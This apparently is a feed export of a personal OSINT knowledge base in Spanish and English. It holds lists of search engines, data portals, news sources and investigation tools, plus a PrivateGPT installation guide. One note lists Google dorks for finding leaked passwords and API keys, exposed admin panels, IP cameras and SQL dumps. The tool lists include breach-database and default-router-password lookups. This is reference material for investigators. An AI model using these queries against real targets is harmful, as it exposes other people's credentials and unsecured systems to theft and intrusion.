tema-osint-toolchain-comparativa ]]>projects/osint-tools/academic-resources.htmlProjects/osint-tools/academic-resources.mdTue, 28 Apr 2026 14:29:14 GMTtema-osint-toolchain-comparativa ]]>projects/osint-tools/ai-search-engines.htmlProjects/osint-tools/ai-search-engines.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia. Search by website source code
AnalyzeID - Find Other Websites Owned By The Same Person
Code Finder - The ultimate search engine for finding GitHub repositories
GitHub Code Search - GitHub's enhanced code search with advanced filtering.
grep.app - Searches code from the entire github public repositories for a given specific string or using regular expression.
NerdyData - Search engine for source code.
PublicWWW
Reposearch
SearchCode - Help find real world examples of functions, API's and libraries across 10+ sources.
Sourcebot - Index thousands of repos on your machine and search through them in a fast, powerful, and modern web interface.
SourceGraph - Search code from millions of open source repositories.
tema-osint-toolchain-comparativa ]]>projects/osint-tools/code-search.htmlProjects/osint-tools/code-search.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
AGOA Data Center
AidData
AWS Public Datasets
Bank for International Settlements Statistics
Berkely Library: Data Lab
BP Statistical Review of World Energy
Center for International Earth Science Information Network
CEPII
CIA World Factbook
Data.gov.uk
DBPedia
European Union Open Data Portal
Eurostat
Freebase
Gapminder World
globalEDGE Database of International Business Statistics
Google Finance
Google Public Data Explorer
Government of Canada Open Data
HIS Piers
Human Development Reports
ILO World Employment and Social Outlook Trends
ILOSTAT
IMF World Economic Outlook Database
Index Mundi
International Energy Agency Statistics
International Labour Comparisons
International Trade Center
Junar
Knoema
LandMatrix
Latinobarometro
Library, University of Michigan: Statistics and Datasets
Nation Master
OECD Aid Database
OECD Data
OECD Factbook
Open Data Network
Paul Hensel’s General Informational Data Page
Penn World Table
Pew Research Center
Population Reference Bureau Data Finder
PRS Risk Indicators
SESRIC Basic Social and Economic Indicators
SESRIC Databases
Statista
The Atlas of Economic Complexity
The Data and Story Library
Trading Economics
Transparency.org Corruption Perception Index
UN COMTRADE Database
UN Data
UNCTAD Country Fact Sheets
UNCTAD Investment Country Profiles
UNCTAD STAT
UNDPs Human Development Index
UNECE
UNESCO Institute for Statistics
UNIDO Statistical Databases
UNStats Social Indicators
Upsala Conflict Data Program
US Data and Statistics
Vizala
WHO Data
World Bank Data
World Bank Data
World Bank Doing Business
World Bank Enterprise Surveys
World Bank Investing Across Borders
World Integrated Trade Solution
WTO Statistics
Zanran
tema-osint-toolchain-comparativa ]]>projects/osint-tools/data-statistics.htmlProjects/osint-tools/data-statistics.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia. Search for data located on PDFs, Word documents, presentation slides, and more.
DocumentCloud - Platform for analyzing, annotating, and publishing documents.
Epstein Exposed - Comprehensive searchable database of 2M+ DOJ Epstein case documents, 1,700+ persons, flight logs, emails, and network graph visualization.
Find-pdf-doc
Free Full PDF
Offshore Leak Database
RECAP Archive - Public archive of PACER court documents.
Scribd
SlideShare
tema-osint-toolchain-comparativa ]]>projects/osint-tools/document-slides-search.htmlProjects/osint-tools/document-slides-search.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
Captin Fact
Check
Emergent
Fact Check
Full Fact
Snopes - The definitive Internet reference source for urban legends, folklore, myths, rumors, and misinformation.
Verification Handbook
tema-osint-toolchain-comparativa ]]>projects/osint-tools/fact-checking.htmlProjects/osint-tools/fact-checking.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia. Search for all kind of files.
eyedex - Open directory search engine.
de digger - is a website that allows you to find any types of files that are publicly available in a Google Drive.
FileListing
FilePursuit
Filesec.io - Central resource cataloging malicious file extensions, their risks, OS and mitigations.
[Find Security Contacts] https://findsecuritycontacts.com - Public index listing security contacts (emails, policies, etc.) extracted from domains security.txt files.
Meawfy - Advanced Mega.nz File Search Engine. Search and discover files from Mega.nz with our intelligent crawler technology. Access over 9 million indexed files instantly.
NAPALM FTP Indexer
ODCrawler - A search engine for open directories. Find millions of publicly available files!
SearchFiles.de
tema-osint-toolchain-comparativa ]]>projects/osint-tools/file-search.htmlProjects/osint-tools/file-search.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia. The main search engines used by users.
Aol - The web for America.
Ask - Ask something and get a answer.
Bing - Microsoft´s search engine.
Brave - a private, independent, and transparent search engine.
Goodsearch - a search engine for shopping deals online.
Google Search - Most popular search engine.
Instya - You can searching shopping sites, dictionaries, answer sites, news, images, videos and much more.
Impersonal.me
Lycos - A search engine for pictures, videos, news and products.
Mojeek - A growing independent search engine which does not track you.
Perplexity - AI-powered search engine with source citations.
Phind - AI search engine optimized for developers and technical questions.
Search.com - Search the Web by searching the best engines from one place.
Wolfram Alpha - Wolfram Alpha is a computational knowledge engine (answer engine) developed by Wolfram Alpha. It will compute expert-level answers using Wolfram’s breakthrough algorithms, knowledgebase and AI technology.
Yahoo! Search - The search engine that helps you find exactly what you're looking for.
YOU - AI search engine. Importado desde Inbox/Buscadores Genericos.md durante consolidacion bulk. Los tres motores de busqueda genericos fundamentales para cualquier investigacion OSINT. Cada uno tiene fortalezas distintas: Google para cobertura global, Bing para integracion Microsoft y busqueda de imagenes, Yandex para busqueda inversa de imagenes y contenido en la region CIS.Motores de busqueda genericos / Punto de partida OSINT. Punto de partida para cualquier investigacion OSINT Google Dorks para descubrimiento de informacion expuesta Yandex para busqueda inversa de imagenes (superior a Google en muchos casos)
Ver general-search-engines para la lista consolidada con enlaces directos
Ver speciality-search-engines para buscadores de infraestructura
Ver meta-search-engines para metabuscadores adicionales Importado desde Inbox/Buscadores.md durante consolidacion bulk. Indice maestro de buscadores OSINT con enlaces directos, dividido en dos categorias: buscadores genericos para investigacion web convencional y buscadores especificos para descubrimiento de infraestructura expuesta.Motores de busqueda / Indice consolidado. Referencia rapida para acceder a los buscadores principales
Punto de partida para investigaciones de domain-ip-research y domain-ip-research
Ver general-search-engines y speciality-search-engines para detalles de cada categoria
Ver meta-search-engines para metabuscadores adicionales
tema-osint-toolchain-comparativa ]]>projects/osint-tools/general-search-engines.htmlProjects/osint-tools/general-search-engines.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia. Google Dorks Tools
DorkGenius - DorkGenius is the ultimate tool for generating custom search queries for Google, Bing, and DuckDuckGo. - Our cutting-edge app uses the power of AI to help you create advanced search queries that can find exactly what you're looking for on the web.
DorkGPT - Generate Google Dorks with AI.
Google Hacking Database (GHDB) - The GHDB is an index of search queries (we call them dorks) used to find publicly available information, intended for pentesters and security researchers.
SearchDorks - Generate Search Engine (Google, FOFA, Shodan, Censys, ZoomEye) Dorks using AI.
Fuente complementaria del master osint-references-master. 2025 Dorks (specific):# Sensitive information leaks site:pastebin.com "password" "@company.com" site:github.com "api_key" OR "api_secret" "company" site:trello.com intext:"password" OR intext:"passwd" # Exposed corporate documents site:*.s3.amazonaws.com ext:xls | ext:xlsx "confidential" filetype:pdf intext:"internal use only" site:gov # IP cameras and IoT devices inurl:/view/view.shtml intitle:"webcamXP 5" # Exposed admin panels intitle:"index of" "admin" intitle:"Dashboard" inurl:login inurl:wp-admin intitle:"Dashboard" # Exposed databases intitle:"phpMyAdmin" "Welcome to phpMyAdmin" inurl:"/phpmyadmin/index.php" "#mysql dump" filetype:sql # Employee information site:linkedin.com "company name" "CEO" | "CTO" | "CISO" site:*.linkedin.com "@companymail.com" # Subdomains (combine with crt.sh) site:*.target.com -www site:*.*.target.com
tema-osint-toolchain-comparativa ]]>projects/osint-tools/google-dorks-tools.htmlProjects/osint-tools/google-dorks-tools.mdTue, 28 Apr 2026 14:29:14 GMTPrivateGPT is a production-ready AI project that allows you to ask questions about your documents using the power of Large Language Models (LLMs), even in scenarios without an Internet connection. 100% private, no data leaves your execution environment at any point.Running it on Windows Subsystem for Linux (WSL) with GPU support can significantly enhance its performance. In this guide, I will walk you through the step-by-step process of installing PrivateGPT on WSL with GPU acceleration.Installing this was a pain in the a** and took me 2 days to get it to work. Hope this can help you on your own journey… Good luck!Before we begin, make sure you have the latest version of Ubuntu WSL installed. You can choose from versions such as Ubuntu-22–04–3 LTS or Ubuntu-22–04–6 LTS available on the Windows Store. Updating Ubuntu sudo apt-get update sudo apt-get upgrade sudo apt-get install build-essential ℹ️ “upgrade” is very important as python stuff will explode later if you don’tgit clone https://github.com/imartinez/privateGPT To manage Python versions, we’ll use pyenv. Follow the commands below to install it and set up the Python environment: sudo apt-get install git gcc make openssl libssl-dev libbz2-dev libreadline-dev libsqlite3-dev zlib1g-dev libncursesw5-dev libgdbm-dev libc6-dev zlib1g-dev libsqlite3-dev tk-dev libssl-dev openssl libffi-dev curl https://pyenv.run | bash export PATH="/home/$(whoami)/.pyenv/bin:$PATH" Add the following lines to your.bashrc file: export PYENV_ROOT="$HOME/.pyenv" -d $PYENV_ROOT/bin && export PATH="$PYENV_ROOT/bin:$PATH" eval "$(pyenv init -)" Reload your terminal source ~/.bashrc Install important missing pyenv stuff sudo apt-get install lzma sudo apt-get install liblzma-dev Install Python 3.11 and set it as the global version: pyenv install 3.11 pyenv global 3.11 pip install pip --upgrade pyenv local 3.11 Install poetry to manage dependencies: curl -sSL https://install.python-poetry.org | python3 - Add the following line to your.bashrc: export PATH="/home/<YOU USERNAME>/.local/bin:$PATH" ℹ️ Replace by your WSL username ($ whoami)Reload your configuration source ~/.bashrc poetry --version # should display something without errors Navigate to the PrivateGPT directory and install dependencies: cd privateGPT poetry install --extras "ui embeddings-huggingface llms-llama-cpp vector-stores-qdrant" In need of a free and open-source Multi-Agents framework built for running local LLMs?
▶️ Checkout Yacana
Visit Nvidia’s official website to download and install the Nvidia drivers for WSL. Choose Linux > x86_64 > WSL-Ubuntu > 2.0 > deb (network)Follow the instructions provided on the page.Add the following lines to your.bashrc: export PATH="/usr/local/cuda-12.4/bin:$PATH" export LD_LIBRARY_PATH="/usr/local/cuda-12.4/lib64:$LD_LIBRARY_PATH" ℹ️ Maybe check the content of “/usr/local” to be sure that you do have the “cuda-12.4” folder. Yours might have a different version.Reload your configuration and check that all is working as expected source ~/.bashrc nvcc --version nvidia-smi.exe ℹ️ “nvidia-smi” isn’t available on WSL so just verify that the.exe one detects your hardware. Both commands should displayed gibberish but no apparent errors.Finally, install LLAMA CUDA libraries and Python bindings: CMAKE_ARGS='-DLLAMA_CUBLAS=on' poetry run pip install --force-reinstall --no-cache-dir llama-cpp-python Let private GPT download a local LLM for you (mixtral by default): poetry run python scripts/setup To run PrivateGPT, use the following command: make run This will initialize and boot PrivateGPT with GPU support on your WSL environment.ℹ️ You should see “blas = 1” if GPU offload is working. ............................................................................................... llama_new_context_with_model: n_ctx = 3900 llama_new_context_with_model: freq_base = 1000000.0 llama_new_context_with_model: freq_scale = 1 llama_kv_cache_init: CUDA0 KV buffer size = 487.50 MiB llama_new_context_with_model: KV self size = 487.50 MiB, K (f16): 243.75 MiB, V (f16): 243.75 MiB llama_new_context_with_model: graph splits (measure): 3 llama_new_context_with_model: CUDA0 compute buffer size = 275.37 MiB llama_new_context_with_model: CUDA_Host compute buffer size = 15.62 MiB AVX = 1 | AVX_VNNI = 0 | AVX2 = 1 | AVX512 = 0 | AVX512_VBMI = 0 | AVX512_VNNI = 0 | FMA = 1 | NEON = 0 | ARM_FMA = 0 | F16C = 1 | FP16_VA = 0 | WASM_SIMD = 0 | BLAS = 1 | SSE3 = 1 | SSSE3 = 1 | VSX = 0 | 18:50:50.097 [INFO ] private_gpt.components.embedding.embedding_component - Initializing the embedding model in mode=local ℹ️ Go to 127.0.0.1:8001 in your browser
Uploaded the Orca paper and asking random stuff about it.By following these steps, you have successfully installed PrivateGPT on WSL with GPU support. Enjoy the enhanced capabilities of PrivateGPT for your natural language processing tasks.If something went wrong then open your window and throw your computer away. Then start again at step 1.You can also remove the WSL with: If this article help you in any way consider giving it a like! ThxHaving a crash when asking a question or doing make run? Here are the issues I encountered and how I fixed them. Cuda error CUDA error: the provided PTX was compiled with an unsupported toolchain. current device: 0, in function ggml_cuda_op_flatten at /tmp/pip-install-3kkz0k8s/llama-cpp-python_a300768bdb3b475da1d2874192f22721/vendor/llama.cpp/ggml-cuda.cu:9119 cudaGetLastError() GGML_ASSERT: /tmp/pip-install-3kkz0k8s/llama-cpp-python_a300768bdb3b475da1d2874192f22721/vendor/llama.cpp/ggml-cuda.cu:271: !"CUDA error" huggingface/tokenizers: The current process just got forked, after parallelism has already been used. Disabling parallelism to avoid deadlocks... To disable this warning, you can either: - Avoid using \`tokenizers\` before the fork if possible - Explicitly set the environment variable TOKENIZERS_PARALLELISM=(true | false) make: *** [Makefile:36: run] Aborted This one comes from downloading the latest CUDA stuff and your drivers are not up to date. So open the Nvidia "Geforce experience" app from Windows and upgrade to the latest version and then reboot. CPU only If privateGPT still sets BLAS to 0 and runs on CPU only, try to close all WSL2 instances. Then reopen one and try again. If it's still on CPU only then try rebooting your computer. This is not a joke… Unfortunatly.I tried to use the server of LMStudio as fake OpenAI backend. It does work but not very well. Need to do more tests on that and I’ll update here.For now what I did is start the LMStudio server on the port 8002 and unchecked “Apply Prompt Formatting”.On PrivateGPT I edited “settings-vllm.yaml” and updated “openai > api_base” to “http://localhost:8002/v1" and the model to “dolphin-2.7-mixtral-8x7b.Q5_K_M.gguf” which is the one I use in LMStudio. It’s displayed in LMStudio if your wondering.
▶️ Checkout Yacana Importado desde Inbox/zylon-aiprivate-gpt Interact with your documents using the power of GPT, 100% privately, no data leaks.md. PrivateGPT es un proyecto de IA production-ready que permite consultar documentos usando LLMs de forma completamente privada, sin que los datos salgan del entorno de ejecucion. Proporciona una API compatible con OpenAI con dos bloques: High-level (RAG abstraction para ingestion + chat con contexto) y Low-level (generacion de embeddings + retrieval de chunks). Incluye Gradio UI, arquitectura FastAPI + LlamaIndex, y soporte para deployment local o cloud.PrivateGPT addresses the privacy concern in generative AI adoption, especially in data-sensitive domains like healthcare and legal. It allows organizations to run LLM-powered document Q&A entirely offline or on private infrastructure.Key value proposition: If you can use OpenAI API in your tools, you can use PrivateGPT as a drop-in replacement with no code changes, and for free in local setup.
Full documentation at: https://docs.privategpt.dev/Docker deployment available via .docker/ directory with docker-compose. Ingestion: Document parsing, splitting, metadata extraction, embedding generation, storage Chat & Completions: Context retrieval from ingested documents, prompt engineering, response generation Embeddings generation: Based on a piece of text Contextual chunks retrieval: Given a query, returns most relevant chunks from ingested documents Gradio UI client for testing the API Bulk model download script Ingestion script Documents folder watch Healthcare/Legal: Organizations that cannot risk data leaving their environment Enterprise: Private cloud deployment (AWS, GCP, Azure) via Zylon enterprise Development: Local AI development without API costs Research: Offline document analysis and Q&A LangChain (framework, not a product) GPT4All (local LLM inference) LocalAI (OpenAI-compatible API) Ollama (local model serving) API: FastAPI following OpenAI API scheme RAG pipeline: LlamaIndex-based Key architectural decisions: Dependency Injection for decoupling components LlamaIndex abstractions (LLM, BaseEmbedding, VectorStore) for easy implementation swapping Simplicity -- minimal layers and abstractions Ready to use -- full implementation included Code structure: private_gpt:server:<api> -- API definitions (<api>_router.py for FastAPI, <api>_service.py for service logic) private_gpt:components:<component> -- Actual implementations of base abstractions Qdrant: Default vector database Fern: Documentation and SDKs LlamaIndex: Base RAG framework Python 75.8%, MDX 23.3%, Makefile 0.9% Apache-2.0 License 332 Commits, 10 Releases @software{Zylon_PrivateGPT_2023, author = {Zylon by PrivateGPT}, license = {Apache-2.0}, month = may, title = {{PrivateGPT}}, url = {https://github.com/zylon-ai/private-gpt}, year = {2023} } Introduction -- Pagina introductoria de la documentacion oficial
PrivateGPT Docs
Zylon Enterprise
GitHub Repository
tema-osint-toolchain-comparativa ]]>projects/osint-tools/privategpt-local-llm.htmlProjects/osint-tools/privategpt-local-llm.mdTue, 28 Apr 2026 14:29:14 GMT<figure><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1saf30ttizfp578cxnvn.PNG"></figure>osint-references-master. Concepto unico = nota propia.
Google Adwords - Get monthly keyword volume data and stats.
Google Trends - See how many users are searching for specific keywords.
Keyword Discovery
Keyword Spy
KeywordTool
One Look Reverse Dictionary
Soovle
Ubersuggest
Word Tracker
Yandex Wordstat
tema-osint-toolchain-comparativa ]]>projects/osint-tools/keywords-discovery.htmlProjects/osint-tools/keywords-discovery.mdTue, 28 Apr 2026 14:29:14 GMTlampyre.io Lampyre Blog: "Top Paid OSINT Tools in 2026" (2025-12-21) Lampyre Blog: "Discover a Powerful OSINT Industries Alternative with Lampyre" (2025-12-21) [10] LinkedIn: "Lampyre is the OSINT Tool People Are Not Talking About Enough" - Matthew Loong (2020-10-03) [11] Raebaker Blog: "OSINT Quick Guide: Running a Domain Scan in Lampyre" (2020-02-07) [12] YouTube: "Lampyre tutorial #3 - Cyber threat intelligence" (2018-11-28) [14] Lampyre Blog: "Connection between companies and people - Lampyre tutorial" (2025-11-18) [15] Lampyre Blog: "Basic Due Diligence - Searching for Connections between Companies and People" (2025-11-18) [16] SEON: "Top 10 OSINT Software & Tools" (2024-11-03) [18] Lampyre Blog: "Discover a Powerful Spokeo Alternative with Lampyre" (2025-12-21) [19] Lampyre Blog: "Discover a Powerful EPIEOS Alternative with Lampyre" (2025-12-21) [21] Lampyre Terms of Service (2025-03-12) [29] Lampyre Blog: "What Is Email OSINT And How Does It Work" (2025-12-21)
tema-osint-toolchain-comparativa ]]>projects/osint-tools/lampyre-tool.htmlProjects/osint-tools/lampyre-tool.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
see the Awesome Translations list
tema-osint-toolchain-comparativa ]]>projects/osint-tools/language-tools.htmlProjects/osint-tools/language-tools.mdTue, 28 Apr 2026 14:29:14 GMTLampyre integran búsqueda en los tres niveles Concepto fundamental de OSINT y ciberseguridad Tecnologías de acceso a DarkNets: Tor Project, Freenet, I2P (Invisible Internet Project)
tema-osint-toolchain-comparativa ]]>projects/osint-tools/web-niveles-deep-dark.htmlProjects/osint-tools/web-niveles-deep-dark.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia. Localized search engines by country.
Alleba (Philippines) - Philippines search engine
Baidu (China) - The major search engine used in China
Daum (South Korea)
Eniro (Sweden)
Gerdoo (Iran)
Goo (Japan)
Najdi (Slovenia)
Naver (South Korea)
Onet.pl (Poland)
Orange (France)
Parseek (Iran)
SAPO (Portugal)
Search.ch (Switzerland)
Seznam(Czech Republic)
SoGou (China)
Walla (Israel)
Yandex (Russia)
Zarebin (Iran)
tema-osint-toolchain-comparativa ]]>projects/osint-tools/national-search-engines.htmlProjects/osint-tools/national-search-engines.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia. Lesser known and used search engines.
All-in-One
AllTheInternet
Etools
FaganFinder
Goofram
iZito
Myallsearch
Qwant - French search engine that relies on Microsoft Bing.
SearXNG - A privacy-respecting, open-source metasearch engine.
Swisscows Importado desde Inbox/METABUSCADORES Y BUSCADORES.md durante consolidacion bulk. Catalogo de metabuscadores (que consultan multiples motores simultaneamente) y buscadores especializados utiles para OSINT. Incluye desde buscadores policiales hasta motores de busqueda de dispositivos IoT, servidores FTP y datasets academicos.Metabuscadores / Motores de busqueda / Busqueda especializada. Buscar en multiples motores simultaneamente (metabuscadores) Descubrir dispositivos IoT expuestos (Shodan) Buscar archivos en servidores FTP publicos (NAPALM FTP) Encontrar datasets y documentos academicos relevantes Buscar archivos en Google Drives publicos (dedigger) Shodan es fundamental para reconnaissance de infraestructura NAPALM FTP y dedigger pueden revelar archivos sensibles expuestos accidentalmente
Ver general-search-engines para buscadores convencionales
Ver speciality-search-engines para buscadores de nichos concretos
tema-osint-toolchain-comparativa ]]>projects/osint-tools/meta-search-engines.htmlProjects/osint-tools/meta-search-engines.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
1st Headlines
ABYZNewsLinks
Agence France-Presse (AFP)
AllYouCanRead
AP
BBC News
Bing News
CNN
Cyber Alert
DailyEarth
DPA International
Euronews
Factiva
France24
Google News
Google News Print Archive
HeadlineSpot
Itar-Tass
List of Newspapers.com
MagPortal
News Map
News Now
Newseum - Today Front Pages
Newslink
NewsLookup
Newspaper Map
Newspaperindex
Newspapers.com
NewsWhip
OnlineNewspapers
Paperboy
PR Newswire
Press Reader
Reuters
Silobreaker
Topix
WorldNews
World-Newspapers
Yahoo News
tema-osint-toolchain-comparativa ]]>projects/osint-tools/news-osint.htmlProjects/osint-tools/news-osint.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
Flipboard
Inshorts
Newsinshorts
Nod
Reeder
Spike
Storyful
Superdesk
Trooclick
tema-osint-toolchain-comparativa ]]>projects/osint-tools/news-digest-discovery.htmlProjects/osint-tools/news-digest-discovery.mdTue, 28 Apr 2026 14:29:14 GMTosint-mastery-guide — secciones de contenido (descartado meta-repo: Acknowledgments, License, Contact, Support). Advanced search engines and specialized databases for comprehensive information gathering: 🔎 Advanced Search Engines: Google dorking, Bing intelligence, specialized search platforms 🗄️ Specialized Databases: Industry-specific, academic, and government databases 🎓 Academic Resources: Research publications, thesis databases, educational platforms 🏛️ Government Databases: Public records, regulatory filings, official documents Platform-specific analysis tools and cross-platform intelligence gathering: 📊 Platform-Specific Tools: Facebook, Twitter, LinkedIn, Instagram, TikTok analyzers 🌐 Cross-Platform Analyzers: Multi-platform correlation and analysis tools 💭 Sentiment Analysis: Opinion mining and emotional intelligence tools 🗺️ Network Mapping: Social graph analysis and relationship visualization Infrastructure analysis and technical intelligence gathering: 🌐 Domain Analysis: WHOIS, DNS, certificate transparency tools 📡 Network Scanning: Port scanning, service enumeration, vulnerability assessment 🔐 Certificate Analysis: SSL/TLS analysis, certificate transparency logs 🗺️ Infrastructure Mapping: Network topology, hosting analysis, CDN detection Person-focused investigation and identity verification tools: 🆔 Identity Verification: Name, address, phone number validation tools 🔍 Background Checking: Criminal records, employment history, education verification 📞 Contact Discovery: Email, phone number, social media profile discovery 👨‍👩‍👧‍👦 Relationship Mapping: Family connections, professional networks, associate analysis Artificial intelligence tools revolutionizing OSINT investigations: 🔍 Pattern Recognition: Automated anomaly detection and behavioral analysis 📊 Data Correlation: Cross-source information linking and relationship discovery 📈 Predictive Analytics: Trend analysis and forecasting capabilities 🎯 Automated Targeting: Intelligent lead generation and priority scoring Text analysis and linguistic intelligence tools: 📝 Document Analysis: Automated report generation and summarization 🌍 Language Translation: Multi-language investigation capabilities 💭 Sentiment Mining: Opinion analysis and emotional intelligence 🏷️ Entity Extraction: Automated identification of people, places, organizations Visual analysis and multimedia investigation tools: 🔍 Reverse Image Search: Advanced image matching and source identification 👤 Facial Recognition: Identity verification through facial analysis 📍 Geolocation Analysis: Location identification through visual cues 🎥 Video Analysis: Frame-by-frame analysis and content extraction ⭐ Stars: Track repository popularity and community interest 🍴 Forks: Monitor community adoption and customization 👥 Contributors: Growing community of OSINT professionals 📈 Downloads: Template and tool usage statistics 🌍 Global Reach: International community of users and contributors 🔄 Regular Updates: Monthly tool updates and template improvements 📚 Book Alignment: Synchronized with book editions and updates 🆕 New Features: Quarterly addition of new templates and tools 🐛 Bug Fixes: Immediate response to reported issues 🌟 Community Requests: Regular implementation of community suggestions
tema-osint-references-master-deep-dive
tema-osint-toolchain-comparativa ]]>projects/osint-tools/osint-mastery-tools.htmlProjects/osint-tools/osint-mastery-tools.mdTue, 28 Apr 2026 14:29:14 GMTtema-osint-toolchain-comparativa ]]>projects/osint-tools/osint-tools-tabla.htmlProjects/osint-tools/osint-tools-tabla.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
aadinternals - Provides tools and insights for advanced analysis and security testing of Azure Active Directory (AAD) and Microsoft 365.
ArkhamMirror - Local-first AI document intelligence with offline RAG, contradiction detection, knowledge graphs, and vision AI table extraction.
Barcode Reader - Decode barcodes in C#, VB, Java, C\C++, Delphi, PHP and other languages.
BeVigil-CLI - A unified command line interface and python library for using BeVigil OSINT API to search for assets such as subdomains, URLs, applications indexed from mobile applications.
Cyberbro - A self-hosted application, available as a Dockerized, for effortless searching and reputation checking of observables. Extracts IoCs from raw input and check their reputation using multiple services.
CyberGordon - CyberGordon is a threat intelligence search engine. It leverages 30+ sources.
CrowdSec - An open source, free, and collaborative IPS/IDS software written in Go, able to analyze visitor behavior & provide an adapted response to all kinds of attacks.
Datasploit - Tool to perform various OSINT techniques on usernames, emails addresses, and domains.
Dehashed CLI - Command-line tool for searching breach databases via DeHashed API.
Discoshell - A simple discovery script that uses popular tools like subfinder, amass, puredns, alterx, massdns and others
Dorkgpt - Artificial intelligence that generates advanced search queries to find specific or hidden information on the internet.
DuckDuckGo URL scraper - A simple DuckDuckGo URL scraper.
FaviconHash - Generate favicon hashes of a website for use on Shodan, VirusTotal, Censys, ZoomEye or FOFA.
Find osint tool - Searches multiple OSINT tools to find information across various sources.
FOCA - Tool to find metadata and hidden information in the documents.
Glit - Retrieve all mails of users related to a git repository, a git user or a git organization.
Greynoise - "Anti-Threat Intelligence" Greynoise characterizes the background noise of the internet, so the user can focus on what is actually important.
IntelHub – Browser-based open-source OSINT extension. All analysis runs locally (no servers). Features include text profiler, metadata analyzer, site & archive analysis, reverse image search, crypto/telegram analyzers.
Hunchly - Hunchly is a web capture tool designed specifically for online investigations.
IntellyWeave - AI-powered OSINT platform with GLiNER entity extraction, Mapbox 3D geospatial visualization, and multi-agent archive research across 30+ international archives.
LinkScope Client - LinkScope Client Github repository.
LinkScope - LinkScope is an open source intelligence (OSINT) graphical link analysis tool and automation platform for gathering and connecting information for investigative tasks.
Maltego - Maltego is an open source intelligence (OSINT) and graphical link analysis tool for gathering and connecting information for investigative tasks.
Mozilla HTTP Observatory - Observatory⁩ enhances web security by analyzing compliance with best security practices.
Obsidian - Knowledge base and note-taking tool ideal for OSINT case management.
OpenGraph Intel (OGI) - Open Source Link Analysis & OSINT Framework. AI Powered Investigation Tool
OpenRefine - Free & open source power tool for working with messy data and improving it.
Orbit - Draws relationships between crypto wallets with recursive crawling of transaction history.
OSINT Framework - Web based framework for OSINT.
OSINT-Tool - A browser extension that gives you access to a suite of OSINT utilities (Dehashed, Epieos, Domaintools, Exif data, Reverse image search, etc) directly on any webpage you visit.
OSINT.SH - Information Gathering Toolset.
OsintStalker - Python script for Facebook and geolocation OSINT.
Outwit - Find, grab and organize all kinds of data and media from online sources.
PGPKeyAnalyser - Analyse and view the details of a PGP key online without having to download the asc file.
Photon - Crawler designed for OSINT
Pyba - A browser automation framework which requires low-code to search the web and perform OSINT using DFS and BFS modes, ideal for exploratory tasks.
pygreynoise - Greynoise Python Library
QuickCode - Python and R data analysis environment.
Router Passwords - Online database of default router passwords.
SerpApi - Scrapes Google search and 25+ search engines with ease and retruns a raw JSON. Supports 10 API wrappers.
SerpScan - Powerful PHP script designed to allow you to leverage the power of dorking straight from the comfort of your command line. Analyzes data from Google, Bing, Yahoo, Yandex, and Badiu.
Sintelix - Sintelix is an open source intelligence (OSINT) and graphical link analysis tool for gathering and connecting information for investigative tasks.
sn0int - Semi-automatic OSINT framework and package manager.
SpiderFoot - SpiderFoot Github repository.
SpiderFoot - SpiderFoot is an open source intelligence (OSINT) automation platform with over 200 modules for threat intelligence, attack surface monitoring, security assessments and asset discovery.
SpiderSuite - An advance, cross-platform, GUI web security crawler.
Sub3 Suite - A research-grade suite of tools for intelligence gathering & target mapping with both active and passive(100+ modules) intelligence gathering capabilities.
The Harvester - Gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database.
Unfurl - Unfurl analyzes and breaks down URLs into useful forensic components for digital investigation.
Waybackurls - Fetch all URLs known by the Wayback Machine for a domain.
Zen - Find email addresses of Github users urls and other data effortlessly Importado desde Inbox/CONVERSOR DE ARCHIVOS.md durante consolidacion bulk. Utilidades online de conversion de formatos para apoyo en investigaciones OSINT. Incluye conversor de texto (ASCII/Hex) y conversor de video.Utilidades / Conversion de formatos. Decodificar strings ofuscados en investigaciones de malware Convertir formatos de archivo para analisis Apoyo general a flujos de trabajo OSINT Ver PRODUCTIVIDAD para mas herramientas de apoyo ASCII to Hex soporta multiples conversiones: ASCII, Hex, Binary, Base64, etc.
tema-osint-toolchain-comparativa ]]>projects/osint-tools/other-osint-tools.htmlProjects/osint-tools/other-osint-tools.mdTue, 28 Apr 2026 14:29:14 GMTQueryTool is a specialized OSINT framework integrated within Google Sheets, aimed at simplifying the process of generating queries for various search engines to obtain specific results. Designed as an initial step in reconnaissance, QueryTool enables users to conduct sophisticated searches for terms, usernames, email addresses, files, and more. It primarily comprises a set of resources facilitating direct access to search outcomes, supporting the cyber investigation process with a subjective collection of tools and services.The spreadsheet is categorized into four sections, each containing useful search tools: Recon & SOCMINT Search engines for general research purposes and tools tailored for social media search. Virtual HUMINT Tools for gathering and analyzing information about individuals, including wallets and cryptocurrency transaction analysis. Web & Domain Resources for domain and website reconnaissance. Dark Web Search Search engines for the Tor network, facilitating exploration and investigation of dark web content. Sign in to your Google account and navigate to the QueryTool spreadsheet. Select File > Make a copy to create an editable version for your personal use. Proceed to the chosen sheet and input the relevant data. It is not mandatory to fill in all fields; provide the information available to you and review the generated links in the designated area. For searching specific phrases, replace spaces with dots to maintain the hyperlink functionality without impacting search results. Important: Do not request access to the original tool. Always make a copy for personal use. We welcome contributions from the community! If you have suggestions for new search tools or improvements to existing spreadsheet, please feel free to submit an issue or pull request.
QUERYTOOL We're all about sharing and improving. Contribute your ideas or tweaks!
Discord Oryon's OSINT Hub: Join us
Telegram ORYON VAULT: Follow us
LinkedIn: Connect with us
Website: Explore more
